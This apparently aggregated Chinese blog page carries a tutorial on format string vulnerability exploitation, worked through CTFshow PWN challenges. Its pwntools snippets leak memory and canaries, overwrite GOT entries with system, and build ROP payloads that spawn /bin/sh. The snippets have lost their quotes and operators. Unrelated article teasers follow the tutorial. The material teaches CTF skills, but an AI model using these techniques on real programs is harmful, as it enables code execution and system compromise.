当前位置: 首页 > article >正文

格式化字符串漏洞利用的5种常见手法:以CTFshow题目为例

格式化字符串漏洞实战5种高级利用手法与CTFshow案例分析格式化字符串漏洞Format String Vulnerability是二进制安全领域中最经典也最危险的漏洞类型之一。这种漏洞源于程序员错误地将用户输入直接作为格式化字符串参数传递给printf、sprintf等函数使得攻击者能够控制格式化字符串的内容。本文将深入剖析格式化字符串漏洞的5种高级利用手法并结合CTFshow平台上的真实题目进行实战演示。1. 格式化字符串漏洞基础与利用原理在深入利用技巧之前我们需要理解格式化字符串漏洞的基本原理。当程序使用类似printf(user_input)而非printf(%s, user_input)的写法时就埋下了安全隐患。格式化字符串中的特殊符号如%x、%p、%n会被printf系列函数解析为格式说明符%x/%p泄露栈内存内容%s泄露任意地址内存可能导致段错误%n向指定地址写入已输出的字符数%c输出字符%hhn/%hn按字节/半字写入漏洞利用的关键步骤确定偏移量找出用户输入在栈上的位置构造payload精心设计格式化字符串实现目标内存泄露、代码执行等提示在32位系统中参数通过栈传递64位系统则优先使用寄存器当参数超过6个时才使用栈。2. 内存信息泄露从栈到任意地址读取内存泄露是格式化字符串漏洞最直接的利用方式通过%x、%p或%s可以获取程序内存中的敏感信息。2.1 栈内存泄露CTFshow-PWN92展示了最简单的利用方式from pwn import * io remote(pwn.challenge.ctf.show, 28221) io.sendline(%s) # 直接泄露栈上指针指向的内容 print(io.recvall())2.2 任意地址泄露更高级的利用是通过构造指针来读取特定内存地址的内容如获取GOT表项# CTFshow-PWN96 部分exp puts_got elf.got[puts] payload p32(puts_got) b%6$s # 读取puts函数的真实地址 io.sendline(payload) puts_addr u32(io.recv(4))泄露技巧对比表方法格式化符特点适用场景栈泄露%p/%x简单直接快速获取栈上信息任意读%s地址需要构造指针读取GOT表、canary等链式泄露多%p组合无需构造指针未知偏移时的信息收集3. GOT表劫持实现任意代码执行全局偏移表(GOT)劫持是格式化字符串漏洞利用中最强大的技术之一通过修改GOT表中的函数指针来控制程序执行流。3.1 基本原理泄露libc基地址通过已调用函数的GOT表项计算目标函数地址如system覆写GOT表项通常选择printf或strlen3.2 CTFshow-PWN95实战分析# 泄露puts地址获取libc基址 puts_got elf.got[puts] payload p32(puts_got) b%6$s io.sendline(payload) puts_addr u32(io.recvuntil(b\xf7)[-4:]) libc_base puts_addr - libc.dump(puts) # 计算system地址并劫持printf_got system_addr libc_base libc.dump(system) printf_got elf.got[printf] payload fmtstr_payload(6, {printf_got: system_addr}) io.sendline(payload) io.sendline(b/bin/sh) # 触发printf(/bin/sh)实际执行system(/bin/sh)GOT劫持注意事项选择不常用但会被调用的函数进行劫持注意字节序和写入大小%n、%hn或%hhn考虑ASLR的影响需要先泄露地址4. 栈保护绕过格式化字符串与canary破解栈保护机制Stack Canary是现代二进制保护的基本措施但格式化字符串漏洞可以绕过这种保护。4.1 Canary泄露原理Canary通常位于栈上的固定偏移处通过格式化字符串可以读取其值# CTFshow-PWN98 部分exp payload b%5$s.%15$p # 同时泄露puts地址和canary io.sendline(payload) puts_addr u32(io.recvuntil(b\xf7)[-4:]) canary int(io.recvuntil(b.)[:-1], 16)4.2 完整利用流程泄露canary值泄露libc基地址构造ROP链或直接覆盖返回地址在溢出时保持canary值不变# 构造包含正确canary的payload payload bA*(0x34-12) p32(canary) p32(0)*3 payload p32(system_addr) p32(0x0804876B) p32(binsh) io.sendline(payload)5. 高级利用技巧一次性攻击与条件竞争5.1 单次利用技巧CTFshow-PWN100当格式化字符串只能使用一次时需要精心构造payload同时完成多个操作# 同时完成canary泄露和返回地址修改 fmt_attack(b%7$n-%16$p) # 修改a1为0使其可重复利用并泄露地址 io.recvuntil(-) ret_addr int(io.recvuntil(b\n)[:-1],16)-0x285.2 格式化字符串与堆结合在更复杂的场景中格式化字符串漏洞可能与堆漏洞结合# 结合堆布局泄露堆地址 payload b%p*20 # 扫描栈寻找堆指针 io.sendline(payload) heap_addr int(io.recvuntil(b0x)[-10:], 16)高级技巧对比表技巧关键点适用场景单次利用组合多个操作限制使用次数的场景堆栈结合泄露堆/栈指针需要堆操作的题目盲打技术暴力枚举偏移无回显或远程题目6. 自动化利用与防御绕过现代CTF题目往往设置了更复杂的防护措施需要更智能的利用方式。6.1 自动化偏移探测# CTFshow-PWN99 暴力探测 def leak(payload): io remote(pwn.challenge.ctf.show,28216) io.sendline(payload) data io.recv() if data.startswith(b0x): print(p64(int(data, 16))) io.close() for i in range(1,100): payload f%{i}$p.encode() leak(payload)6.2 防御措施与绕过方法常见防御及应对策略格式化字符串过滤绕过使用%hn代替%n或组合%c等Partial RELRO绕过仍然可以修改GOT表FULL RELRO替代方案修改返回地址或函数指针栈不可执行解决方案ROP或劫持已有函数在实际漏洞利用中往往需要结合多种技术才能成功利用。理解每种手法的原理和适用场景才能在CTF比赛和实际安全研究中灵活运用。

相关文章:

格式化字符串漏洞利用的5种常见手法:以CTFshow题目为例

格式化字符串漏洞实战:5种高级利用手法与CTFshow案例分析 格式化字符串漏洞(Format String Vulnerability)是二进制安全领域中最经典也最危险的漏洞类型之一。这种漏洞源于程序员错误地将用户输入直接作为格式化字符串参数传递给printf、spri…...

Suno API:生成 AI 音乐的完整指南

简介 Suno API 是 Ace Data Cloud 提供的一项强大服务,旨在将 AI 音乐生成能力集成到您的应用程序中。借助这一稳定且全面的 RESTful API,您可以创建自定义歌曲、纯音乐、混音、翻唱等。本文将详细介绍如何使用 Suno API,并提供快速上手的指…...

当知识有了‘关系网‘:LightRAG如何让大模型‘秒懂‘你的文档?

想象一下,你有一座藏书万卷的图书馆,但你找书的方式只有一种——记住每本书某个页面的关键词,然后靠"猜"来定位。 这,就是传统RAG系统的尴尬处境。 今天要介绍的这个开源项目LightRAG,被顶会EMNLP 2025接收…...

AI辅助开发:让快马AI智能生成自适应Win10镜像下载管理工具

AI辅助开发:让快马AI智能生成自适应Win10镜像下载管理工具 最近在折腾一个Windows系统镜像下载管理工具,发现传统下载方式存在不少痛点:下载源选择困难、网络波动导致中断、版本特性不透明。正好接触到InsCode(快马)平台的AI辅助开发功能&am…...

开源可部署!PyTorch 2.8 RTX 4090D镜像在企业AIGC生产环境落地实践

开源可部署!PyTorch 2.8 RTX 4090D镜像在企业AIGC生产环境落地实践 1. 为什么选择这个深度学习镜像 在当今AI技术快速发展的背景下,企业面临的最大挑战之一是如何快速搭建稳定高效的AI开发环境。传统方式需要手动配置CUDA、PyTorch和各种依赖库&#x…...

Ubuntu22.04微信依赖冲突的终极解决方案

1. 问题现象与原因分析 最近在Ubuntu 22.04上安装微信时,很多朋友都遇到了依赖冲突的问题。具体表现是当你尝试通过命令行安装微信时,系统会提示类似这样的错误信息: 下列软件包有未满足的依赖关系: libldap-2.4-2 : 依赖: libsas…...

Windows 11 + CUDA 12.1 保姆级教程:手把手搞定Detectron2环境搭建(含Git加速与权限避坑)

Windows 11 CUDA 12.1 终极指南:零障碍搭建Detectron2开发环境 RTX 40系显卡用户注意了!如果你正在Windows 11上尝试搭建Detectron2开发环境,却苦于找不到针对CUDA 12.1的完整解决方案,这篇指南将为你扫清所有障碍。不同于网上那…...

Zephyr与MCUBoot的深度整合:从构建到安全启动的完整指南

1. 为什么需要安全启动? 在嵌入式开发中,设备固件的安全性往往是最容易被忽视的一环。想象一下,如果你的智能门锁固件被恶意篡改,或者医疗设备的程序被非法替换,后果会有多严重?这就是为什么我们需要MCUBoo…...

YOLO-v8.3实战:用AI识别图片中的物体,5分钟完成你的第一个检测项目

YOLO-v8.3实战:用AI识别图片中的物体,5分钟完成你的第一个检测项目 你是否曾经好奇,那些能自动识别照片中物体的人工智能是如何工作的?想象一下,你拍了一张街景照片,AI不仅能告诉你照片里有汽车、行人和红…...

像素剧本圣殿部署指南:Qwen2.5-14B-Instruct在生产环境中稳定运行的GPU显存优化技巧

像素剧本圣殿部署指南:Qwen2.5-14B-Instruct在生产环境中稳定运行的GPU显存优化技巧 1. 项目概述 像素剧本圣殿(Pixel Script Temple)是一款基于Qwen2.5-14B-Instruct大模型深度微调的专业剧本创作工具。它将先进的AI推理能力与独特的8-Bit…...

Linux I2C设备驱动避坑指南:以MPU6050为例,详解i2c_transfer与数据读取失败

Linux I2C设备驱动深度调试:MPU6050通信稳定性问题全解析 当你在嵌入式系统中集成MPU6050传感器时,是否遇到过这样的场景:设备树配置正确,驱动代码逻辑清晰,但传感器数据读取却间歇性失败,内核日志中频繁出…...

Vivado 2020.2实战:XDMA IP核配置全解析(含PCIe 2.0速率计算避坑指南)

Vivado 2020.2实战:XDMA IP核配置全解析(含PCIe 2.0速率计算避坑指南) 在FPGA与主机间的高速数据交互场景中,PCIe协议凭借其高带宽和低延迟特性成为首选方案。Xilinx提供的XDMA IP核作为PCIe与AXI总线的桥梁,其配置过程…...

GRPO实战:如何用多个reward function优化你的RL模型?(附完整代码示例)

GRPO实战:多奖励函数融合策略与代码实现指南 强化学习模型的效果很大程度上取决于奖励函数的设计。单一奖励函数往往难以全面评估复杂任务,而多奖励函数融合策略能更精准地引导模型学习。本文将深入探讨GRPO框架中多奖励函数的实战应用,从原理…...

Qt桌面应用集成PaddleOCR:从环境搭建到精准识别的实践指南

1. 环境准备:搭建PaddleOCR的Qt开发环境 第一次在Qt里折腾PaddleOCR时,我对着官方文档折腾了半天还是报错,后来发现是第三方库的路径没配好。这里分享下我踩坑后总结的可靠方案。 核心依赖三件套:PaddlePaddle推理库、PaddleOCR C…...

从零搭建到百万QPS:Python MCP服务器模板实战对比(含Docker镜像体积、CI/CD兼容性、调试友好度全维度打分)

第一章:从零搭建到百万QPS:Python MCP服务器模板实战对比总览在构建高并发、低延迟的MCP(Model Control Protocol)服务时,Python凭借其生态丰富性与开发效率成为主流选型之一,但原生GIL限制与异步模型差异常…...

原神高帧率解锁终极方案:一键突破60帧限制的完全指南

原神高帧率解锁终极方案:一键突破60帧限制的完全指南 【免费下载链接】genshin-fps-unlock unlocks the 60 fps cap 项目地址: https://gitcode.com/gh_mirrors/ge/genshin-fps-unlock 想象一下这样的场景:你在蒙德的原野上自由奔跑,角…...

从语义熵到可信AI:构建大语言模型幻觉检测的通用框架

1. 当AI开始"胡说八道":什么是大语言模型幻觉? 想象一下,你正在咨询一位AI客服关于某款手机的参数。它信誓旦旦地告诉你"这款手机搭载了最新款骁龙8Gen3芯片,电池容量5000mAh",而实际上这款手机用…...

Self Service Password与LDAP集成实战:从部署到问题排查

1. Self Service Password与LDAP集成概述 自助密码重置功能已经成为企业IT基础设施中不可或缺的一部分。想象一下,当员工在深夜加班时忘记密码,又找不到IT支持人员,这种场景下的自助解决方案就显得尤为重要。Self Service Password&#xff0…...

工业以太网双雄:从协议原理到选型落地,EtherCAT与PROFINET实战解析

1. 工业以太网的双雄之争:为什么选型这么难? 第一次接触工业以太网协议选型时,我盯着EtherCAT和PROFINET的参数表发呆了整整一上午。就像面对两个各有所长的武林高手,一个轻功了得,一个内力深厚,实在难以抉…...

告别台式机没麦克风的尴尬:用SonoBus+VB-Cable把手机秒变无线麦(保姆级配置)

台式机零成本无线麦克风方案:SonoBus与VB-Cable实战指南 你是否遇到过这样的尴尬时刻——台式电脑突然需要语音沟通,却发现没有麦克风?无论是紧急会议、游戏开黑还是直播互动,这种硬件缺失带来的困扰可能让你措手不及。本文将介绍…...

Java全栈工程师面试实录:从基础到实战的深度技术探讨

Java全栈工程师面试实录:从基础到实战的深度技术探讨 一、面试开场 面试官(李工):你好,欢迎来到我们公司。我是李工,负责技术面试。今天我们会围绕你的技术栈进行一些深入交流。 应聘者(张明&am…...

TD-ACC+实验系统入门指南:手把手教你搭建典型环节模拟电路

TD-ACC实验系统实战手册:从零构建典型环节电路的21个关键细节 第一次接触TD-ACC实验系统时,看着密密麻麻的接口和旋钮,我的手指悬在半空迟迟不敢落下——生怕一个错误的连接就会烧毁昂贵的运算放大器。这种忐忑直到成功捕捉到第一个完美方波信…...

基于AI政策路径与通胀预期模型的美联储决策分析:鲍威尔观望信号引发加息预期归零

摘要:本文通过构建AI政策路径预测模型,结合通胀预期识别系统、能源价格传导算法与劳动力市场评估框架,对美联储在当前环境下的利率决策逻辑进行分析,重点解析“观望策略”背后的模型依据及市场加息预期快速回落的原因。一、AI政策…...

LingBot-Depth效果实测:与传感器原生深度对比的绝对误差(mm)分布图

LingBot-Depth效果实测:与传感器原生深度对比的绝对误差(mm)分布图 1. 引言:当深度图遇上“脑补”大师 想象一下,你手里有一张用深度相机拍出来的照片,它告诉你每个像素离相机有多远。但问题是&#xff0…...

Ostrakon-VL终端入门指南:如何导出结构化JSON结果用于BI工具接入

Ostrakon-VL终端入门指南:如何导出结构化JSON结果用于BI工具接入 1. 认识Ostrakon-VL终端 Ostrakon-VL终端是一款专为零售与餐饮行业设计的智能图像识别工具,它将复杂的AI技术包装成一个充满游戏感的像素风格界面。这个终端基于Ostrakon-VL-8B多模态大…...

Cortex-M为何不能运行Linux?解析ARM架构与操作系统的兼容性

1. Cortex-M与Linux的兼容性解析作为一名在嵌入式领域摸爬滚打多年的工程师,我经常被问到这个问题:"为什么我的STM32(基于Cortex-M内核)不能跑Linux?"要回答这个问题,我们需要从处理器架构和操作…...

KityMinder云存储与分享功能完整指南:打造高效团队协作体验

KityMinder云存储与分享功能完整指南:打造高效团队协作体验 【免费下载链接】kityminder 百度脑图 项目地址: https://gitcode.com/gh_mirrors/ki/kityminder KityMinder作为百度FEX团队开发的在线思维导图工具,其强大的云存储与分享功能让团队协…...

Deepin系统远程桌面实战:从零配置xrdp服务到Windows无缝连接

Deepin系统远程桌面实战:从零配置xrdp服务到Windows无缝连接 在跨平台协作成为常态的今天,远程桌面技术让不同操作系统间的无缝协作成为可能。对于使用Deepin系统的用户而言,如何高效地通过Windows设备远程访问和控制Deepin桌面,是…...

Qwen3-14B项目管理助手:需求文档生成、甘特图描述、风险点预判

Qwen3-14B项目管理助手:需求文档生成、甘特图描述、风险点预判 1. 项目管理的AI革命 项目管理是一项复杂的工作,涉及需求分析、进度规划、资源调配和风险控制等多个环节。传统方式下,项目经理需要花费大量时间编写文档、绘制甘特图和评估风…...

计算机毕业设计:Python汽车销售数据可视化与分析系统 Flask框架 requests爬虫 可视化 数据分析 大数据 机器学习 大模型(建议收藏)✅

博主介绍:✌全网粉丝10W,前互联网大厂软件研发、集结硕博英豪成立工作室。专注于计算机相关专业项目实战6年之久,选择我们就是选择放心、选择安心毕业✌ > 🍅想要获取完整文章或者源码,或者代做,拉到文章底部即可与…...